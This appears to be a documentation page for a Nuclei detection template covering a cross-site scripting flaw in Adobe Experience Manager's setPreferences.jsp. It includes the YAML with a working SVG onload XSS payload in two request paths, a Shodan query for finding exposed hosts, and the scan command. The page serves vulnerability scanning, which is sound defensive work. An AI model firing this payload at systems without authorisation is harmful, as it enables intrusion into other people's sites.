Adobe Experience Manager - Cross-Site Scripting
ID: aem-setpreferences-xss
Severity: high
Author: zinminphy0,dhiyaneshDK
Tags: aem,xss,misconfig
Description
Section titled “Description”Adobe Experience Manager contains a cross-site scripting vulnerability via setPreferences.
YAML Source
Section titled “YAML Source”id: aem-setpreferences-xss
info: name: Adobe Experience Manager - Cross-Site Scripting author: zinminphy0,dhiyaneshDK severity: high description: Adobe Experience Manager contains a cross-site scripting vulnerability via setPreferences. reference: - https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s - https://github.com/projectdiscovery/nuclei-templates/issues/3225 - https://twitter.com/zin_min_phyo/status/1465394815042916352 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.component:"Adobe Experience Manager" product: experience_manager vendor: adobe tags: aem,xss,misconfig
http: - method: GET path: - "{{BaseURL}}/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a" - "{{BaseURL}}/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"
stop-at-first-match: true
matchers-condition: and matchers: - type: word words: - "<svg/onload=confirm(document.domain);>" - 'A JSONObject text must begin with' condition: and
- type: status status: - 400# digest: 4a0a00473045022011f4c2ab3be20b3855a46fee587b8accfd3b45b4fe0bf76dd12db4aaf75bdbcd0221008bdc2e4fb2627fda486895be03178cf5a8b4ef0a52e48b377c372bc40b7547b7:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/misconfiguration/aem/aem-setpreferences-xss.yaml"